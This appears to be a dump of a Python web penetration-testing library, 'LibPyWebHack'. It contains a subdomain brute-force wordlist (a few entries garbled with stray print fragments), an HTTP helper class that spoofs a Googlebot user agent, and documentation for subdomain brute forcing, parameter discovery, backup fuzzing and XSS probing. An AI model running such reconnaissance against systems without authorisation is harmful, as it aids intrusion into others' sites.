307 | counterstrike 308 | courses 309 | cr 310 | cricket 311 | crm 312 | crs 313 | cs 314 | cso 315 | css 316 | ct 317 | cu 318 | cust1 319 | cust10 320 | cust100 321 | cust101 322 | cust102 323 | cust103 324 | cust104 325 | cust105 326 | cust106 327 | cust107 328 | cust108 329 | cust109 330 | cust11 331 | cust110 332 | cust111 333 | cust112 334 | cust113 335 | cust114 336 | cust115 337 | cust116 338 | cust117 339 | cust118 340 | cust119 341 | cust12 342 | cust120 343 | cust121 344 | cust122 345 | cust123 346 | cust124 347 | cust125 348 | cust126 349 | cust13 350 | cust14 351 | cust15 352 | cust16 353 | cust17 354 | cust18 355 | cust19 356 | cust2 357 | cust20 358 | cust21 359 | cust22 360 | cust23 361 | cust24 362 | cust25 363 | cust26 364 | cust27 365 | cust28 366 | cust29 367 | cust3 368 | cust30 369 | cust31 370 | cust32 371 | cust33 372 | cust34 373 | cust35 374 | cust36 375 | cust37 376 | cust38 377 | cust39 378 | cust4 379 | cust40 380 | cust41 381 | cust42 382 | cust43 383 | cust44 384 | cust45 385 | cust46 386 | cust47 387 | cust48 388 | cust49 389 | cust5 390 | cust50 391 | cust51 392 | cust52 393 | cust53 394 | cust54 395 | cust55 396 | cust56 397 | cust57 398 | cust58 399 | cust59 400 | cust6 401 | cust60 402 | cust61 403 | cust62 404 | cust63 405 | cust64 406 | cust65 407 | cust66 408 | cust67 409 | cust68 410 | cust69 411 | cust7 412 | cust70 413 | cust71 414 | cust72 415 | cust73 416 | cust74 417 | cust75 418 | cust76 419 | cust77 420 | cust78 421 | cust79 422 | cust8 423 | cust80 424 | cust81 425 | cust82 426 | cust83 427 | cust84 428 | cust85 429 | cust86 430 | cust87 431 | cust88 432 | cust89 433 | cust9 434 | cust90 435 | cust91 436 | cust92 437 | cust93 438 | cust94 439 | cust95 440 | cust96 441 | cust97 442 | cust98 443 | cust99 444 | customer 445 | customers 446 | cv 447 | cvs 448 | cx 449 | cy 450 | cz 451 | d 452 | dallas 453 | data 454 | database 455 | database01 456 | database02 457 | database1 458 | database2 459 | databases 460 | datastore 461 | datos 462 | david 463 | db 464 | db0 465 | db01 466 | db02 467 | db1 468 | db2 469 | dc 470 | de 471 | dealers 472 | dec 473 | def 474 | default 475 | defiant 476 | delaware 477 | dell 478 | delta 479 | delta1 480 | demo 481 | demonstration 482 | demos 483 | denver 484 | depot 485 | des 486 | desarrollo 487 | descargas 488 | design 489 | designer 490 | detroit 491 | dev 492 | dev0 493 | dev01 494 | dev1 495 | devel 496 | develop 497 | developer 498 | developers 499 | development 500 | device 501 | devserver 502 | devsql 503 | dhcp 504 | dial 505 | dialup 506 | digital 507 | dilbert 508 | dir 509 | direct 510 | directory 511 | disc 512 | discovery 513 | discuss 514 | discussion 515 | discussions 516 | disk 517 | disney 518 | distributer 519 | distributers 520 | dj 521 | dk 522 | dm 523 | dmail 524 | dmz 525 | dnews 526 | dns 527 | dns-2 528 | dns0 529 | dns1 530 | dns2 531 | dns3 532 | do 533 | docs 534 | documentacion 535 | documentos 536 | domain 537 | domains 538 | dominio 539 | domino 540 | dominoweb 541 | doom 542 | download 543 | downloads 544 | downtown 545 | dragon 546 | drupal 547 | dsl 548 | dyn 549 | dynamic 550 | dynip 551 | dz 552 | e 553 | e-com 554 | e-commerce 555 | e0 556 | eagle 557 | earth 558 | east 559 | ec 560 | echo 561 | ecom 562 | ecommerce 563 | edi 564 | edu 565 | education 566 | edward 567 | ee 568 | eg 569 | eh 570 | ejemplo 571 | elpaso 572 | email 573 | employees 574 | empresa 575 | empresas 576 | en 577 | enable 578 | eng 579 | eng01 580 | eng1 581 | engine 582 | engineer 583 | engineering 584 | enterprise 585 | epsilon 586 | er 587 | erp 588 | es 589 | esd 590 | esm 591 | espanol 592 | estadisticas 593 | esx 594 | et 595 | eta 596 | europe 597 | events 598 | domain 599 | exchange 600 | exec 601 | extern 602 | external 603 | extranet 604 | f 605 | f5 606 | falcon 607 | farm 608 | faststats 609 | fax 610 | feedback 611 | feeds 612 | fi 613 | field 614 | file 615 | files 616 | fileserv 617 | fileserver 618 | filestore 619 | filter 620 | find 621 | finger 622 | firewall 623 | fix 624 | fixes 625 | fj 626 | fk 627 | fl 628 | flash 629 | florida 630 | flow 631 | fm 632 | fo 633 | foobar 634 | formacion 635 | foro 636 | foros 637 | fortworth 638 | forum 639 | forums 640 | foto 641 | fotos 642 | foundry 643 | fox 644 | foxtrot 645 | fr 646 | france 647 | frank 648 | fred 649 | freebsd 650 | freebsd0 651 | freebsd01 652 | freebsd02 653 | freebsd1 654 | freebsd2 655 | freeware 656 | fresno 657 | front 658 | frontdesk 659 | fs 660 | fsp 661 | ftp 662 | ftp- 663 | ftp0 664 | ftp2 665 | ftp_ 666 | ftpserver 667 | fw 668 | fw-1 669 | fw1 670 | fwsm 671 | fwsm0 672 | fwsm01 673 | fwsm1 674 | g 675 | ga 676 | galeria 677 | galerias 678 | galleries 679 | gallery 680 | games 681 | gamma 682 | gandalf 683 | gate 684 | gatekeeper 685 | gateway 686 | gauss 687 | gd 688 | ge 689 | gemini 690 | general 691 | george 692 | georgia 693 | germany 694 | gf 695 | gg 696 | gh 697 | gi 698 | gl 699 | glendale 700 | gm 701 | gmail 702 | gn 703 | go 704 | gold 705 | goldmine 706 | golf 707 | gopher 708 | gp 709 | gq 710 | gr 711 | green 712 | group 713 | groups 714 | groupwise 715 | gs 716 | gsx 717 | gt 718 | gu 719 | guest 720 | gw 721 | gw1 722 | gy 723 | h 724 | hal 725 | halflife 726 | hawaii 727 | hello 728 | help 729 | helpdesk 730 | helponline 731 | henry 732 | hermes 733 | hi 734 | hidden 735 | hk 736 | hm 737 | hn 738 | hobbes 739 | hollywood 740 | home 741 | homebase 742 | homer 743 | honeypot 744 | honolulu 745 | host 746 | host1 747 | host3 748 | host4 749 | host5 750 | hotel 751 | hotjobs 752 | houstin 753 | houston 754 | howto 755 | hp 756 | hpov 757 | hr 758 | ht 759 | http 760 | https 761 | hu 762 | hub 763 | humanresources 764 | i 765 | ia 766 | ias 767 | ibm 768 | ibmdb 769 | id 770 | ida 771 | idaho 772 | ids 773 | ie 774 | iis 775 | il 776 | illinois 777 | im 778 | images 779 | imail 780 | imap 781 | imap4 782 | img 783 | img0 784 | img01 785 | img02 786 | in 787 | inbound 788 | inc 789 | include 790 | incoming 791 | india 792 | indiana 793 | indianapolis 794 | info 795 | informix 796 | inside 797 | install 798 | int 799 | intern 800 | internal 801 | international 802 | internet 803 | intl 804 | intranet 805 | invalid 806 | investor 807 | investors 808 | invia 809 | invio 810 | io 811 | iota 812 | iowa 813 | iplanet 814 | ipmonitor 815 | ipsec 816 | ipsec-gw 817 | iq 818 | ir 819 | irc 820 | ircd 821 | ircserver 822 | ireland 823 | iris 824 | irvine 825 | irving 826 | is 827 | isa 828 | isaserv 829 | isaserver 830 | ism 831 | israel 832 | isync 833 | it 834 | italy 835 | ix 836 | j 837 | japan 838 | java 839 | je 840 | jedi 841 | jm 842 | jo 843 | jobs 844 | john 845 | jp 846 | jrun 847 | juegos 848 | juliet 849 | juliette 850 | juniper 851 | k 852 | kansas 853 | kansascity 854 | kappa 855 | kb 856 | ke 857 | kentucky 858 | kerberos 859 | keynote 860 | kg 861 | kh 862 | ki 863 | kilo 864 | king 865 | km 866 | kn 867 | knowledgebase 868 | knoxville 869 | koe 870 | korea 871 | kp 872 | kr 873 | ks 874 | kw 875 | ky 876 | kz 877 | l 878 | la 879 | lab 880 | laboratory 881 | labs 882 | lambda 883 | lan 884 | laptop 885 | laserjet 886 | lasvegas 887 | launch 888 | lb 889 | lc 890 | ldap 891 | legal 892 | leo 893 | li 894 | lib 895 | library 896 | lima 897 | lincoln 898 | link 899 | linux 900 | linux0 901 | linux01 902 | linux02 903 | linux1 904 | linux2 905 | lista 906 | lists 907 | listserv 908 | listserver 909 | live 910 | lk 911 | load 912 | loadbalancer 913 | local 914 | localhost 915 | log 916 | log0 917 | log01 918 | log02 919 | log1 920 | log2 921 | logfile 922 | logfiles 923 | logger 924 | logging 925 | loghost 926 | login 927 | logs 928 | london 929 | longbeach 930 | losangeles 931 | lotus 932 | louisiana 933 | lr 934 | ls 935 | lt 936 | lu 937 | luke 938 | lv 939 | ly 940 | lyris 941 | m 942 | ma 943 | mac 944 | mac1 945 | mac10 946 | mac11 947 | mac2 948 | mac3 949 | mac4 950 | mac5 951 | mach 952 | macintosh 953 | madrid 954 | mail 955 | mail2 956 | mailer 957 | mailgate 958 | mailhost 959 | mailing 960 | maillist 961 | maillists 962 | mailroom 963 | mailserv 964 | mailsite 965 | mailsrv 966 | main 967 | maine 968 | maint 969 | mall 970 | manage 971 | management 972 | manager 973 | manufacturing 974 | map 975 | mapas 976 | maps 977 | marketing 978 | marketplace 979 | mars 980 | marvin 981 | mary 982 | maryland 983 | massachusetts 984 | master 985 | max 986 | mc 987 | mci 988 | md 989 | mdaemon 990 | me 991 | media 992 | member 993 | members 994 | memphis 995 | mercury 996 | merlin 997 | messages 998 | messenger 999 | mg 1000 | mgmt 1001 | mh 1002 | mi 1003 | miami 1004 | michigan 1005 | mickey 1006 | midwest 1007 | mike 1008 | milwaukee 1009 | minneapolis 1010 | minnesota 1011 | mirror 1012 | mis 1013 | mississippi 1014 | missouri 1015 | mk 1016 | ml 1017 | mm 1018 | mn 1019 | mngt 1020 | mo 1021 | mobile 1022 | mom 1023 | monitor 1024 | monitoring 1025 | montana 1026 | moon 1027 | moscow 1028 | movies 1029 | mozart 1030 | mp 1031 | mp3 1032 | mpeg 1033 | mpg 1034 | mq 1035 | mr 1036 | mrtg 1037 | ms 1038 | ms-exchange 1039 | ms-sql 1040 | msexchange 1041 | mssql 1042 | mssql0 1043 | mssql01 1044 | mssql1 1045 | mt 1046 | mta 1047 | mtu 1048 | mu 1049 | multimedia 1050 | music 1051 | mv 1052 | mw 1053 | mx 1054 | my 1055 | mysql 1056 | mysql0 1057 | mysql01 1058 | mysql1 1059 | mz 1060 | n 1061 | na 1062 | name 1063 | names 1064 | nameserv 1065 | nameserver 1066 | nas 1067 | nashville 1068 | nat 1069 | nc 1070 | nd 1071 | nds 1072 | ne 1073 | nebraska 1074 | neptune 1075 | net 1076 | netapp 1077 | netdata 1078 | netgear 1079 | netmeeting 1080 | netscaler 1081 | netscreen 1082 | netstats 1083 | network 1084 | nevada 1085 | new 1086 | newhampshire 1087 | newjersey 1088 | newmexico 1089 | neworleans 1090 | news 1091 | newsfeed 1092 | newsfeeds 1093 | newsgroups 1094 | newton 1095 | newyork 1096 | newzealand 1097 | nf 1098 | ng 1099 | nh 1100 | ni 1101 | nigeria 1102 | nj 1103 | nl 1104 | nm 1105 | nms 1106 | nntp 1107 | no 1108 | node 1109 | nokia 1110 | nombres 1111 | nora 1112 | north 1113 | northcarolina 1114 | northdakota 1115 | northeast 1116 | northwest 1117 | noticias 1118 | novell 1119 | november 1120 | np 1121 | nr 1122 | ns 1123 | ns- 1124 | ns0 1125 | ns01 1126 | ns02 1127 | ns1 1128 | ns2 1129 | ns3 1130 | ns4 1131 | ns5 1132 | ns_ 1133 | nt 1134 | nt4 1135 | nt40 1136 | ntmail 1137 | ntp 1138 | ntserver 1139 | nu 1140 | null 1141 | nv 1142 | ny 1143 | nz 1144 | o 1145 | oakland 1146 | ocean 1147 | odin 1148 | office 1149 | offices 1150 | oh 1151 | ohio 1152 | ok 1153 | oklahoma 1154 | oklahomacity 1155 | old 1156 | om 1157 | omaha 1158 | omega 1159 | omicron 1160 | online 1161 | ontario 1162 | open 1163 | openbsd 1164 | openview 1165 | operations 1166 | ops 1167 | ops0 1168 | ops01 1169 | ops02 1170 | ops1 1171 | ops2 1172 | opsware 1173 | or 1174 | oracle 1175 | orange 1176 | order 1177 | orders 1178 | oregon 1179 | orion 1180 | orlando 1181 | oscar 1182 | out 1183 | outbound 1184 | outgoing 1185 | outlook 1186 | outside 1187 | ov 1188 | owa 1189 | owa01 1190 | owa02 1191 | owa1 1192 | owa2 1193 | ows 1194 | oxnard 1195 | p 1196 | pa 1197 | page 1198 | pager 1199 | pages 1200 | paginas 1201 | papa 1202 | paris 1203 | parners 1204 | partner 1205 | partners 1206 | patch 1207 | patches 1208 | paul 1209 | payroll 1210 | pbx 1211 | pc 1212 | pc01 1213 | pc1 1214 | pc10 1215 | pc101 1216 | pc11 1217 | pc12 1218 | pc13 1219 | pc14 1220 | pc15 1221 | pc16 1222 | pc17 1223 | pc18 1224 | pc19 1225 | pc2 1226 | pc20 1227 | pc21 1228 | pc22 1229 | pc23 1230 | pc24 1231 | pc25 1232 | pc26 1233 | pc27 1234 | pc28 1235 | pc29 1236 | pc3 1237 | pc30 1238 | pc31 1239 | pc32 1240 | pc33 1241 | pc34 1242 | pc35 1243 | pc36 1244 | pc37 1245 | pc38 1246 | pc39 1247 | pc4 1248 | pc40 1249 | pc41 1250 | pc42 1251 | pc43 1252 | pc44 1253 | pc45 1254 | pc46 1255 | pc47 1256 | pc48 1257 | pc49 1258 | pc5 1259 | pc50 1260 | pc51 1261 | pc52 1262 | pc53 1263 | pc54 1264 | pc55 1265 | pc56 1266 | pc57 1267 | pc58 1268 | pc59 1269 | pc6 1270 | pc60 1271 | pc7 1272 | pc8 1273 | pc9 1274 | pcmail 1275 | pda 1276 | pdc 1277 | pe 1278 | pegasus 1279 | pennsylvania 1280 | peoplesoft 1281 | personal 1282 | pf 1283 | pg 1284 | pgp 1285 | ph 1286 | phi 1287 | philadelphia 1288 | phoenix 1289 | phoeniz 1290 | phone 1291 | phones 1292 | photos 1293 | pi 1294 | pics 1295 | pictures 1296 | pink 1297 | pipex-gw 1298 | pittsburgh 1299 | pix 1300 | pk 1301 | pki 1302 | pl 1303 | plano 1304 | platinum 1305 | pluto 1306 | pm 1307 | pm1 1308 | pn 1309 | po 1310 | policy 1311 | polls 1312 | pop 1313 | pop3 1314 | portal 1315 | portals 1316 | portfolio 1317 | portland 1318 | post 1319 | posta 1320 | posta01 1321 | posta02 1322 | posta03 1323 | postales 1324 | postoffice 1325 | ppp1 1326 | ppp10 1327 | ppp11 1328 | ppp12 1329 | ppp13 1330 | ppp14 1331 | ppp15 1332 | ppp16 1333 | ppp17 1334 | ppp18 1335 | ppp19 1336 | ppp2 1337 | ppp20 1338 | ppp21 1339 | ppp3 1340 | ppp4 1341 | ppp5 1342 | ppp6 1343 | ppp7 1344 | ppp8 1345 | ppp9 1346 | pptp 1347 | pr 1348 | prensa 1349 | press 1350 | print >> sys.stdout,er 1351 | print >> sys.stdout,serv 1352 | print >> sys.stdout,server 1353 | priv 1354 | privacy 1355 | private 1356 | problemtracker 1357 | products 1358 | profiles 1359 | project 1360 | projects 1361 | promo 1362 | proxy 1363 | prueba 1364 | pruebas 1365 | ps 1366 | psi 1367 | pss 1368 | pt 1369 | pub 1370 | public 1371 | pubs 1372 | purple 1373 | pw 1374 | py 1375 | q 1376 | qa 1377 | qmail 1378 | qotd 1379 | quake 1380 | quebec 1381 | queen 1382 | quotes 1383 | r 1384 | r01 1385 | r02 1386 | r1 1387 | r2 1388 | ra 1389 | radio 1390 | radius 1391 | rapidsite 1392 | raptor 1393 | ras 1394 | rc 1395 | rcs 1396 | rd 1397 | re 1398 | read 1399 | realserver 1400 | recruiting 1401 | red 1402 | redhat 1403 | ref 1404 | reference 1405 | reg 1406 | register 1407 | registro 1408 | registry 1409 | regs 1410 | relay 1411 | rem 1412 | remote 1413 | remstats 1414 | reports 1415 | research 1416 | reseller 1417 | reserved 1418 | resumenes 1419 | rho 1420 | rhodeisland 1421 | ri 1422 | ris 1423 | rmi 1424 | ro 1425 | robert 1426 | romeo 1427 | root 1428 | rose 1429 | route 1430 | router 1431 | router1 1432 | rs 1433 | rss 1434 | rtelnet 1435 | rtr 1436 | rtr01 1437 | rtr1 1438 | ru 1439 | rune 1440 | rw 1441 | rwhois 1442 | s 1443 | s1 1444 | s2 1445 | sa 1446 | sac 1447 | sacramento 1448 | sadmin 1449 | safe 1450 | sales 1451 | saltlake 1452 | sam 1453 | san 1454 | sanantonio 1455 | sandiego 1456 | sanfrancisco 1457 | sanjose 1458 | saskatchewan 1459 | saturn 1460 | sb 1461 | sbs 1462 | sc 1463 | scanner 1464 | schedules 1465 | scotland 1466 | scotty 1467 | sd 1468 | se 1469 | search 1470 | seattle 1471 | sec 1472 | secret 1473 | secure 1474 | secured 1475 | securid 1476 | security 1477 | sendmail 1478 | seri 1479 | serv 1480 | serv2 1481 | server 1482 | server1 1483 | servers 1484 | service 1485 | services 1486 | servicio 1487 | servidor 1488 | setup 1489 | sg 1490 | sh 1491 | shared 1492 | sharepoint 1493 | shareware 1494 | shipping 1495 | shop 1496 | shoppers 1497 | shopping 1498 | si 1499 | siebel 1500 | sierra 1501 | sigma 1502 | signin 1503 | signup 1504 | silver 1505 | sim 1506 | sirius 1507 | site 1508 | sj 1509 | sk 1510 | skywalker 1511 | sl 1512 | slackware 1513 | slmail 1514 | sm 1515 | smc 1516 | sms 1517 | smtp 1518 | smtphost 1519 | sn 1520 | sniffer 1521 | snmp 1522 | snmpd 1523 | snoopy 1524 | snort 1525 | so 1526 | socal 1527 | software 1528 | sol 1529 | solaris 1530 | solutions 1531 | soporte 1532 | source 1533 | sourcecode 1534 | sourcesafe 1535 | south 1536 | southcarolina 1537 | southdakota 1538 | southeast 1539 | southwest 1540 | spain 1541 | spam 1542 | spider 1543 | spiderman 1544 | splunk 1545 | spock 1546 | spokane 1547 | springfield 1548 | sprint >> sys.stdout, 1549 | sqa 1550 | sql 1551 | sql0 1552 | sql01 1553 | sql1 1554 | sql7 1555 | sqlserver 1556 | squid 1557 | sr 1558 | ss 1559 | ssh 1560 | ssl 1561 | ssl0 1562 | ssl01 1563 | ssl1 1564 | st 1565 | staff 1566 | stage 1567 | staging 1568 | start 1569 | stat 1570 | static 1571 | statistics 1572 | stats 1573 | stlouis 1574 | stock 1575 | storage 1576 | store 1577 | storefront 1578 | streaming 1579 | stronghold 1580 | strongmail 1581 | studio 1582 | submit 1583 | subversion 1584 | sun 1585 | sun0 1586 | sun01 1587 | sun02 1588 | sun1 1589 | sun2 1590 | superman 1591 | supplier 1592 | suppliers 1593 | support 1594 | sv 1595 | sw 1596 | sw0 1597 | sw01 1598 | sw1 1599 | sweden 1600 | switch 1601 | switzerland 1602 | sy 1603 | sybase 1604 | sydney 1605 | sysadmin 1606 | sysback 1607 | syslog 1608 | syslogs 1609 | system 1610 | sz 1611 | t 1612 | tacoma 1613 | taiwan 1614 | talk 1615 | tampa 1616 | tango 1617 | tau 1618 | tc 1619 | tcl 1620 | td 1621 | team 1622 | tech 1623 | technology 1624 | techsupport 1625 | telephone 1626 | telephony 1627 | telnet 1628 | temp 1629 | tennessee 1630 | terminal 1631 | terminalserver 1632 | termserv 1633 | test 1634 | test2k 1635 | testbed 1636 | testing 1637 | testlab 1638 | testlinux 1639 | testo 1640 | testserver 1641 | testsite 1642 | testsql 1643 | testxp 1644 | texas 1645 | tf 1646 | tftp 1647 | tg 1648 | th 1649 | thailand 1650 | theta 1651 | thor 1652 | tienda 1653 | tiger 1654 | time 1655 | titan 1656 | tivoli 1657 | tj 1658 | tk 1659 | tm 1660 | tn 1661 | to 1662 | tokyo 1663 | toledo 1664 | tom 1665 | tool 1666 | tools 1667 | toplayer 1668 | toronto 1669 | tour 1670 | tp 1671 | tr 1672 | tracker 1673 | train 1674 | training 1675 | transfers 1676 | trinidad 1677 | trinity 1678 | ts 1679 | ts1 1680 | tt 1681 | tucson 1682 | tulsa 1683 | tumb 1684 | tumblr 1685 | tunnel 1686 | tv 1687 | tw 1688 | tx 1689 | tz 1690 | u 1691 | ua 1692 | uddi 1693 | ug 1694 | uk 1695 | um 1696 | uniform 1697 | union 1698 | unitedkingdom 1699 | unitedstates 1700 | unix 1701 | unixware 1702 | update 1703 | updates 1704 | upload 1705 | ups 1706 | upsilon 1707 | uranus 1708 | urchin 1709 | us 1710 | usa 1711 | usenet 1712 | user 1713 | users 1714 | ut 1715 | utah 1716 | utilities 1717 | uy 1718 | uz 1719 | v 1720 | va 1721 | vader 1722 | vantive 1723 | vault 1724 | vc 1725 | ve 1726 | vega 1727 | vegas 1728 | vend 1729 | vendors 1730 | venus 1731 | vermont 1732 | vg 1733 | vi 1734 | victor 1735 | video 1736 | videos 1737 | viking 1738 | violet 1739 | vip 1740 | virginia 1741 | vista 1742 | vm 1743 | vmserver 1744 | vmware 1745 | vn 1746 | vnc 1747 | voice 1748 | voicemail 1749 | voip 1750 | voyager 1751 | vpn 1752 | vpn0 1753 | vpn01 1754 | vpn02 1755 | vpn1 1756 | vpn2 1757 | vt 1758 | vu 1759 | w 1760 | w1 1761 | w2 1762 | w3 1763 | wa 1764 | wais 1765 | wallet 1766 | wam 1767 | wan 1768 | wap 1769 | warehouse 1770 | washington 1771 | wc3 1772 | web 1773 | webaccess 1774 | webadmin 1775 | webalizer 1776 | webboard 1777 | webcache 1778 | webcam 1779 | webcast 1780 | webdev 1781 | webdocs 1782 | webfarm 1783 | webhelp 1784 | weblib 1785 | weblogic 1786 | webmail 1787 | webmaster 1788 | webproxy 1789 | webring 1790 | webs 1791 | webserv 1792 | webserver 1793 | webservices 1794 | website 1795 | websites 1796 | websphere 1797 | websrv 1798 | websrvr 1799 | webstats 1800 | webstore 1801 | websvr 1802 | webtrends 1803 | welcome 1804 | west 1805 | westvirginia 1806 | wf 1807 | whiskey 1808 | white 1809 | whois 1810 | wi 1811 | wichita 1812 | wiki 1813 | wililiam 1814 | win 1815 | win01 1816 | win02 1817 | win1 1818 | win2 1819 | win2000 1820 | win2003 1821 | win2k 1822 | win2k3 1823 | windows 1824 | windows01 1825 | windows02 1826 | windows1 1827 | windows2 1828 | windows2000 1829 | windows2003 1830 | windowsxp 1831 | wingate 1832 | winnt 1833 | winproxy 1834 | wins 1835 | winserve 1836 | winxp 1837 | wire 1838 | wireless 1839 | wisconsin 1840 | wlan 1841 | wordpress 1842 | work 1843 | world 1844 | write 1845 | ws 1846 | ws1 1847 | ws10 1848 | ws11 1849 | ws12 1850 | ws13 1851 | ws2 1852 | ws3 1853 | ws4 1854 | ws5 1855 | ws6 1856 | ws7 1857 | ws8 1858 | ws9 1859 | wusage 1860 | wv 1861 | ww 1862 | www 1863 | www- 1864 | www-01 1865 | www-02 1866 | www-1 1867 | www-2 1868 | www-int 1869 | www0 1870 | www01 1871 | www02 1872 | www1 1873 | www2 1874 | www3 1875 | www_ 1876 | wwwchat 1877 | wwwdev 1878 | wwwmail 1879 | wy 1880 | wyoming 1881 | x 1882 | x-ray 1883 | xi 1884 | xlogan 1885 | xmail 1886 | xml 1887 | xp 1888 | y 1889 | yankee 1890 | ye 1891 | yellow 1892 | young 1893 | yt 1894 | yu 1895 | z 1896 | z-log 1897 | za 1898 | zebra 1899 | zera 1900 | zeus 1901 | zlog 1902 | zm 1903 | zulu 1904 | zw 1905 | -------------------------------------------------------------------------------- /common.py: -------------------------------------------------------------------------------- 1 | import httplib 2 | import re 3 | import sys 4 | from time import sleep 5 | from urllib import urlencode 6 | 7 | __author__ = 'Beched' 8 | 9 | class PyWebHack: 10 | allowed_params = ['host', 'ssl', 'ajax', 'cut', 'sleep', 'verbose', 'output'] 11 | verbose = False 12 | log = '' 13 | cnt_reqs = 0 14 | known_urls = {} 15 | known_subs = [] 16 | args = {} 17 | current_path = '' 18 | add_headers = { 19 | 'Cookie': '', 20 | #'Accept' : 'text/html' 21 | 'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 22 | } 23 | 24 | def __init__(self, *args, **kwargs): 25 | """ 26 | The class constructor. 27 | :param host: a host to work with in format hostname[:port]. The only necessary parameter 28 | :param ssl: if True, HTTPS will be used, default value is 0 29 | :param ajax: if True, "X-Requested-With: XMLHttpRequest" header will be added to all HTTP requests 30 | :param cut: if set, all strings matching specified regexp will be removed from all HTTP responses 31 | :param sleep: if set, sleep after each HTTP request for the specified number of seconds, default value is 0 32 | :param verbose: if True, an output will be sent to self.output or to STDOUT, default value is 1 33 | :param output: the file for output, default is None 34 | :return: 35 | """ 36 | for k, v in kwargs.items(): 37 | if k in self.allowed_params: 38 | self.args[k] = v 39 | if 'host' not in self.args: 40 | self.help() 41 | return 42 | if 'ajax' in self.args: 43 | self.add_headers['X-Requested-With'] = 'XMLHttpRequest' 44 | self.sleep = float(self.args.get('sleep', 0)) 45 | self.cut = self.args.get('cut', '') 46 | self.scheme = 'https' if 'ssl' in self.args else 'http' 47 | self.host = self.args['host'] 48 | self.handler = httplib.HTTPSConnection(self.host) if self.scheme == 'https' else httplib.HTTPConnection( 49 | self.host) 50 | self.url = '%s://%s/' % (self.scheme, self.host) 51 | self.verbose = self.args.get('verbose', 1) 52 | self.output = self.args.get('output', None) 53 | 54 | def __del__(self): 55 | """ 56 | The class destructor. Outputs the total number of HTTP requests made 57 | """ 58 | self.rep_log('==========\n%s requests made' % self.cnt_reqs) 59 | 60 | def rep_log(self, string, delim='\n'): 61 | """ 62 | Logging method. If self.verbose is True, sents output to self.output or to STDOUT 63 | :param string: a log entry 64 | :param delim: a delimiter which is appended to the entry 65 | """ 66 | try: 67 | self.known_urls[self.current_path]['info'] += string + delim 68 | except: 69 | pass 70 | if self.verbose != 0: 71 | if self.output is not None: 72 | open(self.output, 'a+').write('%s%s' % (string, delim)) 73 | else: 74 | sys.stdout.write('%s%s' % (string, delim)) 75 | 76 | def newstructure(self): 77 | """ 78 | Generates a dictionary for holding the information about some path 79 | :return: a dict with all necessary (empty) fields 80 | """ 81 | return { 82 | 'args': {'get': [], 'post': [], 'cookie': []}, 83 | #'bugs': [], 84 | 'info': '', 85 | 'html': None, 86 | 'code': None, 87 | 'hdrs': {} 88 | } 89 | 90 | def restructure(self, path): 91 | """ 92 | Sets current path and generates a new structure for it, if path is new 93 | :param path: current path 94 | """ 95 | self.current_path = path 96 | if path not in self.known_urls: 97 | self.known_urls[path] = self.newstructure() 98 | 99 | def help(self): 100 | """ 101 | A help method template. Called when invalid input is provided to the constructor 102 | """ 103 | self.rep_log( 104 | '==========\nLibPyWebHack\n==========\nThis is a class constructor and it accepts parameters' + 105 | '%s. See docs for explanation.' % self.allowed_params) 106 | 107 | def makereq(self, path, query=None, headers=None, method='GET'): 108 | """ 109 | The core method for sending HTTP requests 110 | :param path: a request URI (if it's directory, it should end with '/') 111 | :param query: a query string 112 | :param headers: a dict with additional request headers 113 | :param method: HTTP request method 114 | :return: a response tuple (str body, int code, dict headers) 115 | """ 116 | sleep(self.sleep) 117 | headers = self.add_headers if headers is None else headers 118 | self.cnt_reqs += 1 119 | if isinstance(query, dict): 120 | query = urlencode(query) 121 | try: 122 | if query is not None: 123 | self.handler.request(method, path, query, headers) 124 | else: 125 | self.handler.request(method, path, headers=headers) 126 | resp = self.handler.getresponse() 127 | return (re.sub(self.cut, '', resp.read()), resp.status, {x: y for (x, y) in resp.getheaders()}) 128 | except httplib.HTTPException: 129 | self.handler = httplib.HTTPSConnection(self.host) if self.scheme == 'https' else httplib.HTTPConnection( 130 | self.host) 131 | return ('', None, None) 132 | except: 133 | self.rep_log('Could not connect to %s! Reason: %s' % (path, sys.exc_info()[1])) 134 | return ('', 0, {}) 135 | 136 | def chkpath(self, paths, comment=None): 137 | """ 138 | Check that the given paths exist. If some path exists, it's added to self.known_urls 139 | :param paths: a list with request URIs 140 | :param comment: a description of what's going on. Will be logged 141 | """ 142 | for path in paths: 143 | self.rep_log('Checking for %s...' % ( '/' + path if comment is None else comment)) 144 | r = self.makereq(self.url + path) 145 | if r[1] != 404: 146 | self.rep_log('Possibly (code %s) found at %s%s' % (r[1], self.url, path)) 147 | self.known_urls.update({'/' + path: self.newstructure()}) 148 | -------------------------------------------------------------------------------- /libpywebhack.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Python: module libpywebhack 4 | 5 | 6 | 7 | 8 |
 
9 |  
libpywebhack		index
/home/beched/PycharmProjects/LibPyWebHack/libpywebhack.py
12 |

#-*- coding:utf-8 -*-

13 |

14 | 15 | 16 | 18 | 19 | 20 |
 
17 | Modules
       
httplib
21 | re
22 | 		socket
23 | sys
24 | 		threading
25 |

26 | 27 | 28 | 30 | 31 | 32 |
 
29 | Classes
       
33 |
common.PyWebHack 34 |
35 |
36 |
WebHack 37 |
38 |
39 |
40 |

41 | 42 | 43 | 45 | 46 | 47 |
 
44 | class WebHack(common.PyWebHack)
    Methods defined here:
48 |
apachetest(self, path)
Perform some security-specific information retrieval from Apache
49 | :param path: target path
50 | 51 |
argsfind(self, path, modes=['get'], fill='1', base='bases/argsbase.txt', fix=[])
Search for the input parameters of the web-scenario
52 | :param path: target path
53 | :param modes: list of the data transition methods ('get', 'post' or 'cookie')
54 | :param fill: the payload which should be plugged into parameters
55 | :param base: path to file with parameter names
56 | :param fix: fixed points, i.e. a list of parameters which should be sent in each request
57 | 58 |
asptest(self, path)
Search for some sensitive .NET-specific files
59 | :param path: target path
60 | 61 |
brutesubs(self, threads=5, words='bases/wordlist2.txt', ban_codes=None, ban_regex=None)
Multi-threaded brute force of existing subdomains of the given domain
62 | :param threads: number of threads
63 | :param words: path to file with subdomain names
64 | :param ban_codes: ignore subdomains which respond with these codes via HTTP
65 | :param ban_regex: ignore subdomains which respond with body matching this regular expression via HTTP
66 | 67 |
dobrute(self, a, b)
A worker-method for WebHack.brutesubs()
68 | :param a: beginning of interval
69 | :param b: end of interval
70 | 71 |
domxsstest(self, path)
Test if javascript-file matches some regular expressions, possibly indicating DOM XSS
72 | :param path: target path
73 | 74 |
fuzzbackups(self, path)
Search for source code backups of the script
75 | :param path: target path
76 | 77 |
gpcreq(self, path, query='', mode='get')
restructure(path)
78 | Send data via GET, POST request or in Cookie-header
79 | :param path: target path
